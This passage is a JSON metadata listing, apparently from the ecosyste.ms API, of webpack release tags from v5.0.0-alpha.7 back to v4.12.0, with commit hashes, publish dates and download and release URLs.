7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/